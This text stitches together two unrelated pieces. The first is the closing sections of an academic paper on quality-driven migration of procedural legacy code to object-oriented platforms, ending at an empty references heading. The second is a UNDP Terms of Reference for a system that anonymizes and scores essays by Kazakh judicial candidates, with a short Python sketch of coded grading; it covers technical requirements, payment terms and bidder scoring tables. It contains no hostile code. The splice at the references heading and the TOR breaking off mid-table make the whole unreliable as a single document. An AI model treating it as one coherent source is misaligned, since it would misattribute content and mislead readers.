Several methods for identifying an object model from a legacy system have been defined. In [8], an approach to identify an object-oriented model from RPG programs is presented. The class identification is centered around persistent data stores, while related chunks of code of the legacy system become candidate methods. In [9], a semi-automatic tool to migrate PL/I programs into C++ is presented. The abstract syntax tree (AST) is used to analyze the original source code, and tokens in the AST are then transformed into C++. Through a similar approach, an automatic Fortran to C/C++ converter is provided in [10], a Pascal to C++ converter in [11], and methodologies to directly identify C++ classes from procedural code written in C in [12]. Moreover, in [12],
an evidence model is presented to help the user select the best-migrated object model. This evidence model includes state change information, return types, and data flow patterns. However, there is no comprehensive framework for ensuring that the migrated system possesses certain quality characteristics.
Software quality properties reflect the degree of conformance to specific non-functional requirements. A process-oriented framework that represents non-functional requirements as soft goals is proposed in [4]. The framework consists of several major components: a set of goals for representing non-functional requirements that positively or negatively contribute to other goals; a set of link types for relating goals to one another; a collection of correlation rules for deducing interdependencies between goals; and finally, a labeling procedure, which gives a quantitative method to determine whether any given non-functional requirement is being addressed by a set of design decisions. In [13], a quality-driven software reengineering framework is proposed. The framework aims to associate specific soft goals, such as performance and maintainability, with transformations, and to guide the software reengineering process. That work focuses on providing a catalog of transformations that refactor object-oriented code into better object-oriented designs using design patterns. In contrast, our approach focuses on the process of migrating procedural code to object-oriented platforms. We refine high-level quality goals such as maintainability and reusability into low-level source-code features (metrics) in the target object-oriented systems. Moreover, we devise a quantitative method to assess the likelihood of each transformation achieving the desired quality goals, and generate the target object-oriented system with the highest quality.
6. Conclusion
This paper presents techniques and methodologies for the incremental migration of procedural legacy systems into object-oriented platforms. We define a quality-driven migration framework to monitor and evaluate quality attributes at each step of the migration process. The migration process involves the representation of procedural code using XML, the recovery of the object model from a procedural system, and the incorporation of non-functional requirements into the migration process. A system segmentation technique is provided to decompose a system into a collection of clusters and, consequently, divide the migration process into phases. In this way, a large system can be reengineered gradually, reducing the risk and computation costs involved. The approach has been used to migrate a number of open source projects. The obtained results demonstrate the effectiveness, usefulness, and scalability of our framework.
Currently, the proposed framework is applied to migrate legacy systems written in C and Fortran to C++. On-going work focuses on applying the framework in more generic software transformation contexts, such as refactoring, restructuring and the development process.
Acknowledgment
I would like to thank my Ph.D. thesis supervisor, Dr. Kostas Kontogiannis for his valuable contribution to this paper.
References
TERMS OF REFERENCE
Service Name: Development of Information system to automate the evaluation of Judge Candidates
Project number and title: 123513 – Institutional support for the Astana Public Service Hub
Contract Type: Contract for Services (UNDP Format)
Location: Kazakhstan, at the location of the company (roundtrip for 1 person to Nur-Sultan is envisaged)
Contract Duration: 3 months from the signing of the UNDP-format Contract (expected May-July 2022)
Background:
The Astana Civil Service Hub (Hub), an initiative of the Government of Kazakhstan and the United Nations Development Programme, was established in 2013 by 25 countries and 5 international organizations, which unanimously adopted the Declaration on the Establishment of the Astana Hub. Currently, the Hub consists of 42 member states. The Hub is a multi-stakeholder platform to promote civil service efficiency by supporting participating governments' efforts to build institutional and human capacity through its main pillars of partnership and networking; capacity building and peer-to-peer learning; and research and knowledge management. In line with its mission, the Hub provides technical support to state bodies and organizations of the Republic of Kazakhstan.
In order to improve the impartiality of the judicial candidate selection, the development of an information system is required to encrypt the papers of judicial candidates and to automate the system of their evaluation by the examiners.
The system will improve the fairness of the candidates’ selection, because after the candidates write essays and cases, the system will automatically encrypt the papers and send them to the assessors. The evaluators, in turn, will not even know who they are evaluating.
Currently, candidates write papers manually by signing their work. The Board Office staff then copies the candidate’s work and sends it to the assessors. Thus, there are currently significant risks of violating the principles of meritocracy when selecting future judges.
The new system will be aimed at improving the procedure for the selection of judges.
Objective:
The objective is to develop an information system to automate the judicial candidate evaluation system for the Supreme Judicial Council.
Scope of Work:
- Developing the information system software;
- Installation of the information system on the Customer’s infrastructure that meets technical requirements (the Supreme Judicial Council of the Republic of Kazakhstan);
- Replication of the system and training of the system administrators;
- Pilot operation of the information system.
Methodological Support:
Terms & Abbreviations:
SW - Software;
DB - Database;
IS - Information System;
IT - Information Technology;
OS - Operating System;
The contractor will automate all aspects of activities related to writing and reviewing essays and case studies.
Workstations of the System users shall be designed on “Thin Client” Technology, which does not require installation of application software on users’ personal computers and eliminates the cost of creating workstations for users.
In addition, for users with limited access to the Internet, the application software vendor will need to develop a user workstation organized without access to the Internet.
The vendor shall ensure implementation of all stages of the System, including:
1) Developing the System’s application software;
2) Development of technical working documentation (User’s Guide, Administrator’s Guide);
3) Conducting preliminary tests;
4) Implementation of the System in all facilities specified by the Client:
• Training of System Administrators (up to 5 Administrators);
• Introduction into trial operation;
• Refinement of the System following the trial operation results;
• Internal acceptance testing;
• Transfer of open-source codes to the depository of the authorized state body
5) Maintenance of the System,
6) Warranty maintenance of the System and expert review of regulatory and technical documentation of the project.
All work related to the development and implementation of the System shall be carried out in accordance with the standards corresponding to the current GOSTs of the Republic of Kazakhstan:
- GOST 34.003-90. Information technology. Set of standards for automated systems. Automated systems. Terms and definitions;
- GOST 34.601-90. Set of standards for automated systems. Automated systems. Design stages;
- GOST 34.201-89. Set of standards for automated systems. Types, completeness and designation of documents when creating automated systems;
- ST RK 34.015-2002. Set of standards for automated systems. Terms of Reference for the creation of an automated system;
- GOST 34.603-92. Information technologies. Types of automatic systems tests;
**The main purpose of the system:**
- Registration and accounting of candidates for writing essays and solving case problems;
- Providing the opportunity to perform case tasks, simulating the judicial practice;
- Providing the opportunity to write essays;
- Generating the roster of candidates who passed the additional means of competitive selection;
- Automatic generation of analytical reports necessary for decision-making in the performance of the main tasks of the Supreme Judicial Council of the Republic of Kazakhstan.
**General Requirements for the System**
The system shall ensure compliance with system-wide principles, which, in particular, include:
• Comprehensiveness, which shall be implemented by creating the System that is flexibly configurable to run various combinations of software and hardware tools of related information systems;
• Modularity, which shall be implemented by means of consecutive division of the System structure into elements: subsystems and workstations;
• Hierarchy, which shall be implemented through designing a multilevel organizational and functional structure of the System in accordance with its division into elements and in compliance with the delegation of authority to work with them to the appropriate employee in accordance with the assigned role functions;
• Purposefulness, which shall be implemented by shaping the System in accordance with the need to support specific business processes
When developing software and System documentation, state information technology standards shall be used. In the tables below, M means a mandatory requirement.
**Standardization & Unification Requirements**
The Vendor shall develop the System in accordance with the following international standards:
- ISO 15489 Records Management
- ISO 26122 Workflow Analysis for Records
- ISO 18128 Risk assessment for accounting processes and systems
- ISO/IEC 16824:1999 Information technology. 120mm DVD-Rewritable Disc (DVD-RAM)
- ISO/IEC 16448:2002 Information technology. DVD-ROM
- ISO 12654:1997 Recommendations on Electronic Imaging for Controlling Electronic Recording Systems for Recording Documents that may be required as Evidence to an Optical Disc WORM
- ISO/IEC TR 9294:2005 Information technology. Recommendations for the software documentation management
- ISO/IEC 9075:2003 Information Technologies. Database languages. SQL. Parts 1, 2 and 11
**Requirements for technical and functional architecture of the System**
When developing the System, the following technical solutions shall be applied:
| M001 | The repository of meta-information about documents shall be implemented within a relational database. The open-source free object-relational database management system based on SQL language shall be used as this database. Database functions shall be executed on the server, not on the client. The database shall allow the use of functions that return a set of records, which can then be used in the same way as the result of an ordinary query. |
| M002 | In terms of User Interface (UI) implementation, a single-page application shall be developed in a multi-paradigm programming language, using any modern set of UI building libraries. The programming language used shall support object-oriented, imperative, and functional styles. Architecturally, the programming language used shall support dynamic typing, weak typing, automatic memory management, and prototype-based programming. The programming language shall also support the following features:
- Objects with the ability to introspect;
- Functions as first-class objects;
- Automatic type conversion;
- Automatic garbage collection;
- Anonymous functions |
| M003 | To implement the server components of the application it is necessary to use a monolithic architecture or multi-module monolithic architecture. |
| M004 | If the Vendor uses off-the-shelf solutions and libraries, all libraries and solutions offered for use shall come with open-source code (open-source solutions). The only exceptions may be software solutions for text recognition and text translation of media files. |
| M005 | The System shall be developed in an object-oriented language. The applications made in the language used shall be convertible into byte-code, which is executed by a virtual machine, a program that processes the byte-code and transmits instructions to the hardware as an interpreter. |
| M006 | Queries to data located in databases shall be performed using the SQL language (SQL queries). Exceptions are queries in the full-text search part. |
**System Component Requirements**
| M007 | There shall be two main roles in the system: Administrator and Candidate. |
| M008 | The following features shall be available to the candidate: |
| | - Signing up as a candidate; |
| | - Writing an essay on a previously selected topic; |
| | - Case study problem solving; |
| | - Getting acquainted with the memo on writing an essay and on solving case problems (depending on the chosen field). |
| M009 | The following features will be available to the administrator: |
| | - Forming a list of candidates; |
| | - Monitoring and analysis of conducted exams; |
| | - Viewing and printing output forms. |
| M010 | The essay shall be typed in the System using the built-in text editor; it shall not exceed 500 words and shall use appropriate formatting. |
| M011 | The system shall generate and assign an individual code to each candidate. |
| M012 | The system shall provide the ability to limit the allotted time to write an essay, with a feedback report. |
| M013 | The system shall make it possible to print works to be submitted to the competition committee without giving any names (only with an individual number). |
| M014 | The system shall provide the ability to evaluate the written work according to seven criteria: |
| | - Ability to identify and analyze problematic issues on a given topic; |
| | - Criticality and creativity of thinking; |
| | - Ability to reason and prove the point of view; |
| | - The validity of opinions; |
| | - Identification of practical and feasible ways to solve the problem; |
| | - Knowing strategic and program documents of the state, legal literacy and reference to the legislation; |
| | - Grammar and vocabulary. |
| M015 | The system shall provide the ability to grade written work on a five-point system. |
| M016 | The system shall enable report generation: the report shall contain the candidates’ names sorted alphabetically and associated code for the candidate. |
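A minimal sketch of the anonymized evaluation workflow implied by requirements M011 to M016: each candidate receives a random individual code, works are graded by code only, and codes are mapped back to names for the final report. All names, the code format, and the helper functions here are hypothetical illustrations, not part of these Terms of Reference:

```python
import secrets

def assign_codes(candidates):
    """M011: assign a unique individual code to each candidate name."""
    codes = {}
    for name in candidates:
        code = secrets.token_hex(4).upper()
        while code in codes:          # guard against an unlikely collision
            code = secrets.token_hex(4).upper()
        codes[code] = name            # code -> name, kept from evaluators
    return codes

def average_grade(scores):
    """M014/M015: seven criteria, each graded on a five-point scale."""
    assert len(scores) == 7 and all(1 <= s <= 5 for s in scores)
    return sum(scores) / 7

def final_report(codes, grades):
    """M016: rows of (name, code, grade), names sorted alphabetically."""
    by_name = {name: code for code, name in codes.items()}
    return [(name, by_name[name], grades[by_name[name]])
            for name in sorted(by_name)]
```

Evaluators see only the codes, so the works they grade remain anonymous; the mapping is applied only when the final report is generated.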
**UI Requirements**
In terms of appearance, the System shall provide a user interface that meets the following requirements:
| M017 | The System interface shall provide a similar design style for subsystems. |
| M018 | The system interface shall be developed in the state (Kazakh) and Russian languages. |
| M019 | The requirements to the user interface may be changed and/or supplemented according to the Client’s requirements and comments of the System users. |
**Requirements for user roles and responsibilities**
| M020 | The system shall provide a minimum set of roles and responsibilities for the specified roles described in Table 1. |
| M021 | Requirements for user roles and responsibilities may be changed and/or supplemented according to the Client’s requirements and the comments of the System users. |
**Table 1. Roles and responsibilities of the System users**
<table>
<thead>
<tr>
<th>Ref. No.</th>
<th>User Role</th>
<th>Role Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Candidate</td>
<td>• Registration as a candidate;<br>• Writing an essay on a previously selected topic;<br>• Case study problem solving;<br>• Reading the guide to writing essays and solving case studies (depending on the chosen area of study).</td>
</tr>
<tr>
<td>2</td>
<td>Administrator</td>
<td>• Formation of the candidate list;<br>• Monitoring and analysis of conducted exams;<br>• Review and printing of output forms.</td>
</tr>
</tbody>
</table>
**Mandatory general composition and scope of work to implement the System**
M022 The Vendor shall arrange for organizational pre-project activities in order to build the Project Team, Develop, coordinate and approve the Calendar Plan within one month after the registration of the Contract with the Treasury Department.
M023 The Vendor shall conduct a pre-project survey of the automation facility to generate requirements for the System, including requirements for server hardware, storage/backup systems, communication channels and administration.
M024 The Vendor shall develop the System.
M025 The Vendor shall conduct functional testing, performance testing, comprehensive system testing and staff training.
M026 The Vendor shall, in conjunction with the Client, perform internal acceptance tests of the System. The Vendor shall provide source code and additional libraries necessary and sufficient to compile the entire System. The deliverable shall be:
- Report and Acceptance Act of the system into operation;
- Software package on 3 CDs.
M027 The Vendor shall perform activities to eliminate system malfunctions and rectify the comments and suggestions of the System users and the Client identified in the course of the System’s test operation.
M028 The Vendor shall provide warranty service for the System.
**Patent Clearance Requirements**
M029 Patent clearance for the methods and technologies used in the territory of the Republic of Kazakhstan.
M030 There are no overt or hidden fees for licenses for the software offered for use, and no fees for further support and updates for that software. The only exceptions may be software solutions for text recognition and text translation of media files.
M031 Transfer the exclusive proprietary rights for all deliverables of the System to the Client, with the possibility of further use of the deliverables by the Client for its own purposes.
M032 Transfer the source codes of all components and libraries necessary for the proper functioning of the system to the Client. Illegal modification and disclosure and (or) use of the source program codes, software products and software are prohibited.
M033 If the Vendor uses out-of-the-box solutions and libraries, all libraries and solutions offered for use shall come with open-source code (open-source solutions). The only exceptions may be software solutions for text recognition and text translation of media files.
**Warranty Service Requirements**
The Vendor undertakes to guarantee the quality of the results obtained in the course of the work. The deadline for the provision of the work quality warranty will be 12 months from the date of the System’s commissioning.
The Vendor shall be responsible for remedying defects, errors and vulnerabilities in the System, and any non-compliance with the technical specification, identified during the warranty period. In the event of any defects or deficiencies during the warranty period, the Vendor shall remedy them at no cost to the Client. The deadline for remedying defects and shortcomings shall be set by agreement between the Client and the Vendor and shall not exceed one month, nor extend beyond the warranty period.
System Information Security Requirements
In order to ensure information security, the Vendor shall be guided and responsible for compliance and ensuring the System’s Information Security requirements in accordance with the information security regulatory and technical documentation of the information system Owner and legislation of the Republic of Kazakhstan in the field of information security within its competence under the signed public procurement agreement.
Signing and submission of the Confidentiality and Non-Disclosure Agreement in the form established by the Client, within 10 (ten) working days from the date of the public procurement contract.
The information security and privacy requirements to the server, network and software being developed shall comply with the requirements of the Client’s regulatory and technical documents in the area of information security.
In order to ensure information security, it is necessary to strictly comply with all regulatory and technical documentation of the Client.
The key security mechanisms of the system are:
– identification and authentication;
– access control;
– logging and auditing.
Training Requirements
The main goal of the training program is to train administrators to operate the System within their job responsibilities.
The Vendor shall train the System administrators at the Client’s premises (not more than 5 people).
The Vendor is responsible for preparing the necessary hard and soft materials (manuals and other training documents).
Deliverables and Payment Terms:
The payments shall be made in accordance with the schedule below. Timing of tasks and payments shall be made according to the following table:
<table>
<thead>
<tr>
<th>No.</th>
<th>Deliverables</th>
<th>Deadline</th>
<th>Terms of Payment</th>
<th>Approval and authorization</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>-Information system software development; -Deployment and configuration of the system on the Client’s infrastructure that meets the technical requirements; -Replication and training of employees; -Pilot operation in the pilot facilities of Supreme Judicial Council of the RK.</td>
<td>Within 3 months after signing the Contract</td>
<td>100% payment after all services will be provided</td>
<td>Project Manager</td>
</tr>
</tbody>
</table>
Result: Ready-to-use System
Payment Schedule:
The Contractor’s proposal shall be submitted with a lump sum payment as specified in “Deliverables and Payment Terms”. The price offer shall include all indirect and direct costs (VAT, if applicable, and other mandatory payments). The Contractor must specify if it pays the VAT or not.
This contract sets a fixed price based on the achieved result, regardless of the extension of its specified duration.
The payment shall be made in full (100%) after satisfactory completion of each item under the Scope of work and authorization of the deliverables by the Project Manager upon submission of the Statement of Completed Work and the Invoice;
Institutional arrangements:
The Project Manager from the UNDP and the Agency of the Republic of Kazakhstan for Counteracting Corruption shall directly supervise the implementation of the entire process. The potential Vendor is accountable for the quality and timely execution of the assigned tasks.
Duration:
3 months after contract signing (approximately May-July 2022).
Location:
The work is performed at the location of the company/organization. Considering the TOR requirement on training of employees, the company should add travel costs for 1 person to its Financial proposal if its location isn’t in Nur-Sultan (preliminary duration of the trip is 5 working days).
Mandatory conditions:
Responsibility and coordination:
• The Contractor should fully accept and agree with the TOR requirements and the General Terms and Conditions for UNDP Contract
• The Contractor shall be responsible for the timely and rational planning, execution of activities and achievement of the expected deliverables in accordance with these Terms of Reference;
• The Contractor shall bear responsibility for the accuracy and legality of the materials and information provided;
• The Contractor shall not be entitled to distribute, transfer data, materials, reports collected/prepared under these terms of reference to third parties without permission of UNDP;
• When carrying out all types of work, the Contractor shall ensure full safety of materials and reports in soft and hard copy. All materials and reports shall be executed in a manner that ensures their safety;
• In the course of the work, the Contractor shall independently hold working meetings on the stages of the work as necessary;
• The work shall be performed in a quality and timely manner, in accordance with the Contract requirements and these Terms of Reference. In case of poor quality of the Contractor’s work (not in accordance with the terms of reference), UNDP reserves the right to submit proposals and comments for rectification within a certain period of time;
• UNDP reserves the right to make amendments in the Terms of Reference (up to 25% of the content), but will not allow changes in the overall essence of the Services and the cost of services under the Contract. The Contractor shall ensure the safe and lawful execution of the required deliverables (reports, finished products, except for the creation of counterfeit products) in all activities that may be required in the execution of this task;
• It is necessary to ensure compliance with the laws and regulations of the Republic of Kazakhstan on copyright (and related rights). It is also required to comply with the laws and regulations of the Republic of Kazakhstan in the execution of this task;
• In the course of work the Contractor is accountable to the UNDP Project Manager in charge of this work. All actions related to the implementation of this work shall be mandatorily agreed with the specified employees of the Project.
IMPORTANT!!! COVID-19. The Contractor is committed to providing all necessary protective equipment for its employees and to comply with all WHO standards and recommendations of local authorities to carry out work during the epidemic. The service provider is responsible for ensuring that its employees involved in this Terms of Reference are properly and promptly provided with all necessary personal protective
equipment in accordance with current WHO guidelines (masks, gloves, disinfectants, COVID-19 test (if necessary)) for the entire period of work on this assignment.
Qualification requirements for the service provider:
The prospective contractor must be a duly registered company/organization that meets the following requirements:
1. Have civil legal capacity to enter into contracts (certificate of registration/re-registration, constituent documents);
2. The organization shall be solvent, not subject to dissolution, its property shall not be seized, its financial and economic activities shall not be arrested in accordance with the legislation (balance sheets for 2020-2021; certificates, statements confirming no debts to the tax authorities and at servicing banks);
3. To have at least 3 years of experience in software development, maintenance, modification and technical support;
4. To provide a list of rendered services for the last 3 years in the field of software development, maintenance, modification and technical support;
5. To possess inventory, methodological, regulatory and software tools for execution of all works, stipulated by the current Terms of Reference;
6. Availability of qualified personnel with the necessary work experience and qualifications according to the table below:
<table>
<thead>
<tr>
<th></th>
<th>Team composition</th>
<th>Number of people</th>
<th>Educational level and field of study</th>
<th>Special skills / work experience</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Project Manager</td>
<td>1</td>
<td>Higher education in IT, economics, finance, management, engineering, or related field;</td>
<td>-Possess any one of the PMI/CPM/Prince2/IPMA certifications; -Experience of at least 2 years in project management.</td>
</tr>
<tr>
<td>2</td>
<td>Information technology management methodology Manager</td>
<td>1</td>
<td>Higher education in IT, economics, finance, management, engineering, or related field;</td>
<td>-COBIT certification, or equivalent; -Experience of at least 1 year in the field of information technology.</td>
</tr>
<tr>
<td>3</td>
<td>Lead analyst</td>
<td>1</td>
<td>Higher education in IT, economics, finance, management, engineering, or related field;</td>
<td>-Certification in business process modeling (OMG Certified UML Professional); -Certification in the field of business analysis (internationally recognized practice of business analysis combining classical approach to business analysis and flexible methodologies); -Experience of at least 3 years in data analytics, business intelligence or modeling.</td>
</tr>
<tr>
<td>4</td>
<td>System Architect</td>
<td>1</td>
<td>Higher education in IT, engineering, or related field;</td>
<td>-Certification in IT Architecture; -Certification in SQL programming language at least “Expert” level; -Certification in the use of cryptographic providers;</td>
</tr>
<tr>
<td>5</td>
<td>Software code developer</td>
<td>1</td>
<td>Higher education in IT, engineering, or related field;</td>
<td>-Certification in Java SE; -Experience of at least 1 year in Java development.</td>
</tr>
<tr>
<td>6</td>
<td>Application Developer</td>
<td>1</td>
<td>Higher education in IT, engineering, or related field;</td>
<td>-Certification in Kubernetes Application Developer; -Certification in Elastic Certified Engineer; -Experience of at least 3 years in application development.</td>
</tr>
<tr>
<td>7</td>
<td>System Administrator</td>
<td>1</td>
<td>Higher education in IT, engineering, or related field;</td>
<td>-Certification in Linux-like operating systems administration (Linux version 7 or higher); -Certification in application server administration; -Certification in Enterprise DB PostgreSQL relational database administration; -Certification in Kubernetes Administration; -Experience of at least 3 years in system administration.</td>
</tr>
<tr>
<td>8</td>
<td>Administrator</td>
<td>1</td>
<td>Higher education in IT, engineering, or related field;</td>
<td>-Experience of at least 3 years in the field of system administration.</td>
</tr>
</tbody>
</table>
**Recommendations for submitting an offer (documents to be provided):**
1) Duly completed, signed and sealed forms of UNDP format: Annex 2a; Annex 2b (Annex 2b must be password protected);
2) Company’s profile with detailed activity information describing the nature of the business, area of expertise:
✓ confirming at least 3 years of experience in software development, maintenance, modification and technical support;
3) Methodology and work schedule. The methodology should communicate what approach will be taken and how the task will be performed, together with a detailed execution plan. The work schedule shall include team composition, assignment of responsibilities, and a brief description of the methods and procedures for performing the work;
4) Certificate of state registration / re-registration;
5) Balance sheets for 2020-2021; certificates confirming the absence of debts to the tax authorities and at servicing banks; VAT certificate, if applicable. If the company is not a VAT payer, written confirmation must be provided;
6) A list of services rendered over the last 3 years in the field of software development, maintenance, modification, technical support with indication of the Customer, name of services / works, year of service provision and customer contact details (e-mail, phone number and full name of contact person);
7) Written confirmation of the facilities (Internet connection, computers, office equipment) necessary to perform this Terms of Reference;
8) Written confirmation that the proposal shall be valid for at least 90 days;
9) Detailed resume, diplomas and certificates of the proposed key personnel, as well as written confirmation from each employee that they will be available for the entire validity of the Contract;
10) All other documents proving qualifications and experience according to the requirements specified in the Vendor Requirements section.
**Best Offer Selection Criteria:**
Highest cumulative score, based on the following weighted allocation: technical proposal (70%) and financial proposal (30%), where the minimum passing score for the technical proposal is 70% (490 points).
**Step I: Preliminary evaluation** (Pass/fail). ONLY fully and timely submitted applications with all required documentation will be considered for preliminary evaluation. Applications will be evaluated against the TOR qualification requirements for the service provider.
**Step II: Technical Evaluation** = maximum 700 points, including:
- Company Professional Experience (20%);
- Proposed Methodology and Work Plan (20%);
- Expert Group Qualifications (60%)
Only bidders who obtain at least 490 points (70% of the 700-point maximum) will be considered for financial evaluation.
**Step III: Financial Evaluation** = 300 points.
**Criteria for Technical Evaluation**
<table>
<thead>
<tr>
<th>#</th>
<th>Criteria</th>
<th>Weight %</th>
<th>Maximum Score</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Company’s expertise</td>
<td>20%</td>
<td>140</td>
</tr>
<tr>
<td>2</td>
<td>Proposed methodology and Work Plan</td>
<td>20%</td>
<td>140</td>
</tr>
<tr>
<td>3</td>
<td>Expert Group Qualifications</td>
<td>60%</td>
<td>420</td>
</tr>
<tr>
<td></td>
<td>Total</td>
<td>100%</td>
<td>700</td>
</tr>
</tbody>
</table>
1. **Company’s Professional Experience**
1.1 Company’s profile with detailed activity information describing the nature of the business, area of expertise:
- ✓ confirming experience in Software Development, Maintenance and Technical Support:
- 3 years of experience – 70 points;
- 4-5 years of experience - 85 points;
- 6 years and more - 100 points.
1.2 Availability of material, technical and software to perform all work stipulated by this Terms of Reference:
- Hardware and Software is available- 40 points.
**Total Section 1**
140
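The tiered scoring in criterion 1.1 can be sketched as a small function (a minimal sketch: the function name and the assumption that fewer than 3 years scores zero are illustrative, not stated in the TOR):

```python
def company_experience_points(years: int) -> int:
    """Criterion 1.1: points for years of experience in software
    development, maintenance, modification and technical support."""
    if years >= 6:
        return 100
    if years >= 4:
        return 85
    if years >= 3:
        return 70
    return 0  # assumption: below the 3-year minimum earns no points
```

For example, a bidder with 5 years of experience would score 85 of the 140 points available in Section 1 (the remaining 40 coming from criterion 1.2).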
## 2. Proposed Methodology and Work Plan
### 2.1 Work Methodology
Whether the proposed methodology complies with the “Methodological support” item of this Terms of Reference, in particular the development of the system:
- Work methodology is available – 35 points;
- The proposed work methodology clearly shows an algorithm for achieving results, detailing and justifying the approaches to performing the work, taking into account the specifics of the task - 50 points.
### 2.2 Methodology Includes All Activities Specified in the TOR, Such as the Development of Information System Software, Building the Necessary Infrastructure, etc.
- Methodology includes some of the aspects - 35 points;
- Methodology includes all aspects - 50 points
### 2.3 Work Schedule (shall include the composition of the team and the distribution of responsibilities):
- Work Schedule is available – 28 points;
- The outlined Work Schedule has a logical framework for achieving deliverables, including the distribution of responsibilities of the expert group members - 40 points.
### Total Section 2
140 points
## 3. Key Personnel Qualifications
### 3.1 Project Manager (1 person)
#### 3.1.1 Higher Education in IT, Economics, Finance, Management, Engineering or Related Fields:
- Bachelor degree – 10.5 points;
- Master’s Degree - 13 points;
- PhD and/or Graduate School - 15 points.
#### 3.1.2 Holds any of the PMI/CPM/Prince2/IPMA Certifications:
- No certificate - 0 points;
- Any of the above Certificates is available - 20 points
#### 3.1.3 Experience in Project Management:
- 2 years - 14 points;
- Each additional year - plus 2 points
- Maximum - 20 points
### Total Section 3.1
55 points
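The experience rule in 3.1.3 — and the analogous rules throughout Section 3 — follows one pattern: a base score at the minimum required years, plus 2 points per additional year, up to a cap. A minimal sketch (the function name and the zero-below-minimum behavior are assumptions of mine):

```python
def experience_points(years, min_years, base=14, per_extra=2, cap=20):
    """Generic experience rule used across Section 3: 'base' points at the
    minimum required years, plus 'per_extra' per additional year, capped."""
    if years < min_years:
        return 0  # assumption: below the stated minimum earns no points
    return min(base + per_extra * (years - min_years), cap)

# Project Manager (3.1.3): minimum 2 years
pm_min = experience_points(2, 2)   # base score at the minimum
pm_cap = experience_points(10, 2)  # long experience hits the cap
```

The same helper covers 3.2.3 (minimum 1 year), 3.3.4 (minimum 3 years), and the later experience criteria, since only `min_years` differs.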
### 3.2 Information Technology Management Methodology Manager (1 person)
#### 3.2.1 Higher Education in IT, Economics, Finance, Management, Engineering or Related Fields:
- Bachelor Degree – 10.5 points;
- Master’s Degree - 13 points;
- PhD and/or Graduate School - 15 points.
<table>
<thead>
<tr>
<th>Subsection</th>
<th>Description</th>
<th>Points</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.2.2</td>
<td>COBIT Certification or Equivalent:</td>
<td>10</td>
</tr>
<tr>
<td>• No Certification – 0 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• COBIT Certification or equivalent - 10 points</td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.2.3</td>
<td>At least 1 year of experience in Information Technology:</td>
<td>20</td>
</tr>
<tr>
<td>• 1 year – 14 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Each additional year - plus 2 points</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Maximum - 20 points</td>
<td></td>
<td></td>
</tr>
<tr>
<td><strong>Total Section 3.2</strong></td>
<td></td>
<td><strong>45</strong></td>
</tr>
<tr>
<td>3.3</td>
<td>Lead Analyst (1 person):</td>
<td></td>
</tr>
<tr>
<td>3.3.1</td>
<td>Higher Education in IT, Economics, Finance, Management, Engineering or Related Fields:</td>
<td>15</td>
</tr>
<tr>
<td>• Bachelor Degree – 10.5 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Master’s Degree - 13 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• PhD and/or Graduate School - 15 points.</td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.3.2</td>
<td>Business Process Modeling Certification (OMG Certified UML Professional):</td>
<td>15</td>
</tr>
<tr>
<td>• No Certification - 0 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Certification is available - 15 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.3.3</td>
<td>Business Analysis Certification (internationally recognized business analysis practice combining classical approach to business analysis and flexible methodologies):</td>
<td>15</td>
</tr>
<tr>
<td>• No Certification - 0 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Certification is available - 15 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.3.4</td>
<td>Experience in Data Analytics, Business Intelligence or Modeling:</td>
<td>20</td>
</tr>
<tr>
<td>• 3 years – 14 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Each additional year - plus 2 points</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Maximum - 20 points</td>
<td></td>
<td></td>
</tr>
<tr>
<td><strong>Total Section 3.3</strong></td>
<td></td>
<td><strong>65</strong></td>
</tr>
<tr>
<td>3.4</td>
<td>System Architect (1 person):</td>
<td></td>
</tr>
<tr>
<td>3.4.1</td>
<td>Higher Education in IT, Engineering, or Related Fields:</td>
<td>15</td>
</tr>
<tr>
<td>• Bachelor Degree – 10.5 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Master’s Degree - 13 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• PhD and/or Graduate School - 15 points.</td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.4.2</td>
<td>IT Architecture Certification:</td>
<td>10</td>
</tr>
<tr>
<td>• No Certification - 0 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Certification is available - 10 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.4.3</td>
<td>Certification in SQL Programming Language at least “Expert” Level:</td>
<td>5</td>
</tr>
<tr>
<td>• No Certification - 0 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Certification is available - 5 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.4.4</td>
<td>Certification in the use of cryptographic providers:</td>
<td>5</td>
</tr>
<tr>
<td>• No Certification - 0 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Certification is available - 5 points;</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
| 3.4.5. | Experience in IT architecture:
- 3 years – 14 points;
- Each additional year – plus 2 points
- Maximum – 20 points | 20 |
| **Total Section 3.4** | **55** |
| 3.5 | **Software Code Developer (1 person):** |
| 3.5.1 | Higher Education in IT, Engineering, or related fields:
- Bachelor Degree – 10.5 points;
- Master’s Degree - 13 points;
- PhD and/or Graduate School - 15 points. | 15 |
| 3.5.2 | Java SE Certification:
- No Certification - 0 points;
- Certification is available - 20 points. | 20 |
| 3.5.3 | Experience in Java Development:
- 1 year – 14 points;
- Each additional year – plus 2 points
- Maximum – 20 points | 20 |
| **Total Section 3.5** | **55** |
| 3.6 | **Application Developer (1 person):** |
| 3.6.1 | Higher education in IT, Engineering, or related fields:
- Bachelor Degree – 10.5 points;
- Master’s Degree - 13 points;
- PhD and/or Graduate School - 15 points. | 15 |
| 3.6.2 | Kubernetes Application Developer Certification:
- No certification - 0 points;
